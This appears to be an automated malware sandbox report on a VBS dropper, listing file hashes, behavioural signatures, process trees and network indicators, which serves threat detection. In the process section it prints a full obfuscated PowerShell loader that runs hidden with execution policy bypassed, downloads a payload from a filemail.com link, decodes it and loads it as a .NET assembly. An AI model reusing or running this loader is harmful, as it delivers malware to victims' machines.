Analysis
max time kernel: 121s
max time network: 122s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 10-11-2024 06:22
Tasks
Static task: static1
Behavioral task: behavioral1
  Sample: Inquiry HA-22-28199 22-077.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: Inquiry HA-22-28199 22-077.vbs
  Resource: win10v2004-20241007-en
General
Target: Inquiry HA-22-28199 22-077.vbs
Size: 12KB
MD5: 605abed3e1d7266ea35c8517b5961010
SHA1: 4c35a1a9e7385b8216812f3c6ff73b23b1710d18
SHA256: 394ce0420dc3786db150a630ceb90bac466bf4a3c3f1f792441fed6fb0b6dc34
SHA512: 15ff74ef09974c51a36cd4197c45c3391dd76317c2d278a34c9df5adf3cbee41f6fc9cf25450d73f3e6f4e63f00c0e65d874f6b572421bf49611544d11467bbc
SSDEEP: 192:bWyKzktunJRUyKzktJDlvgia0GONzU09iT0yFnVk03u3A/WeFW9tWHaFi:Cy44unfUy44dPlzNiKeFsin
Malware Config
Extracted
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
Signatures
Blocklisted process makes network request (4 IoCs)
Processes (flow, pid, process):
  3  2752  WScript.exe
  4  2752  WScript.exe
  8  2768  powershell.exe
  9  2768  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)
Run Powershell and hide display window.
Processes (pid, process):
  2608  powershell.exe
  2768  powershell.exe
Command and Scripting Interpreter: JavaScript (1 TTPs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Script User-Agent (2 IoCs)
Uses user-agent string associated with script host/environment.
Processes (description, flow, ioc):
  HTTP User-Agent header  3  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header  4  Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes (pid, process):
  2608  powershell.exe
  2768  powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description, pid, process):
  Token: SeDebugPrivilege  2608  powershell.exe
  Token: SeDebugPrivilege  2768  powershell.exe
Suspicious use of WriteProcessMemory (9 IoCs)
Processes (description, pid, process, target process):
  PID 2088 wrote to memory of 2752  2088  WScript.exe  WScript.exe
  PID 2088 wrote to memory of 2752  2088  WScript.exe  WScript.exe
  PID 2088 wrote to memory of 2752  2088  WScript.exe  WScript.exe
  PID 2752 wrote to memory of 2608  2752  WScript.exe  powershell.exe
  PID 2752 wrote to memory of 2608  2752  WScript.exe  powershell.exe
  PID 2752 wrote to memory of 2608  2752  WScript.exe  powershell.exe
  PID 2608 wrote to memory of 2768  2608  powershell.exe  powershell.exe
  PID 2608 wrote to memory of 2768  2608  powershell.exe  powershell.exe
  PID 2608 wrote to memory of 2768  2608  powershell.exe  powershell.exe
Processes
1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Inquiry HA-22-28199 22-077.vbs"
   Signatures: Suspicious use of WriteProcessMemory
   PID: 2088
  2. C:\Windows\System32\WScript.exe
     Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CKguwyMRrmjEg.js"
     Signatures: Blocklisted process makes network request; Suspicious use of WriteProcessMemory
     PID: 2752
    3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
       Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
       PID: 2608
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-EXPRESsiOn (('eDyimageUrl = E5rhttps://1017.filemail.com/ap'+'i/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcO'+'c_T35w&pk_vid=fd4f614bb20'+'9c62c1'+'730945176a0904f E5r;eD'+'ywebClient = New-Object System.Net.WebClient;eDyimageBytes = eDywebClient.DownloadData(eDyimageUrl);eDyimageText = [System.Text.Encod'+'ing'+']::UTF8.GetString(eDyimageBytes);eDystartFlag = E5r<<BASE64_START>>E5r;eDyendFlag = E5r<<BASE64_END>>E5r;eDystartInd'+'ex = eDyimageText.IndexOf(eDystartFlag);eDyendIndex = eDyimageText.I'+'ndexOf(eDyendFlag);eDysta'+'rtIndex -ge 0 -and'+' eDyendIndex -gt '+'e'+'DystartIndex;eDystartIndex += eDystartFlag.Length;eDybase64Length = eDyendIndex - eDystartIndex;eDybase64Command = e'+'DyimageT'+'ext.Substring(eDystartIndex, eDybase64Length);eDybase64Reversed = -join (eDy'+'base64Command.ToCharArray() qZG ForEach-Object { eDy_ })[-1..-(eDybase64Command.Length)];eD'+'yc'+'ommandBytes = [System.Convert]::FromBase64'+'String(eDybas'+'e64Reversed);eDyloadedAssembly = [System.Reflection.'+'Assembly]::Load(eDycommandBytes);eDyvaiMethod = [dnlib.IO.'+'Home].GetMethod(E5rVAIE5'+'r);'+'eDyvaiMethod.Invoke(eDynull, @(E5rtxt.dstep/pop/ue.prgxamygrene.gig//:ptthE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5rdesativadoE5r, E5'+'r1E5r, E5rOneDriveSetupE5r,E5rdesativadoE5r, '+'E5rd'+'esativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5rdesativadoE5r,E5r1E5r,E5rdesativadoE5r));').RePLaCe(([CHAR]69+[CHAR]53+[CHAR]114),[sTriNg][CHAR]39).RePLaCe('qZG',[sTriNg][CHAR]124).RePLaCe(([CHAR]101+[CHAR]68+[CHAR]121),'$'))"4⤵
         Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
         PID: 2768
Network
MITRE ATT&CK Enterprise v15
Downloads
(unnamed download)
  Filesize: 1KB
  MD5: ae40e08c0cba583f183151e7917d4947
  SHA1: 79bb3dd394e12d1e598b118ca29e60ad4eeb93b3
  SHA256: b43098cd18ce70e863d2bf5807ea36f95e03c5128ed2442f5886ea4ed4c6927c
  SHA512: 5b4650fafda18f1fa194f4a0d0f30d8e06cfd86788852a47f7b105119da270206af389b034e47637e9eb21962645505ef9fb2645fbd42be775001cfa557ad598

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8F9A8R71UV3GSZ4RE4NQ.temp
  Filesize: 7KB
  MD5: ec34e07bf983f9e9d692544fb8d8439b
  SHA1: 422128d4c7ef24c7eab864eb6ff939a595179337
  SHA256: a40ac2f9c61a8f9a329328d6823f68d337335235c33f267d8368b471b16d3e50
  SHA512: 34719ed2d949d5f2ded8da37aef24f0ee7f6f2b72eab88974d31233a3a1badb62c316756ec8da26c5be4fed4242d795d9971fe756104010fdd3f0a141b035487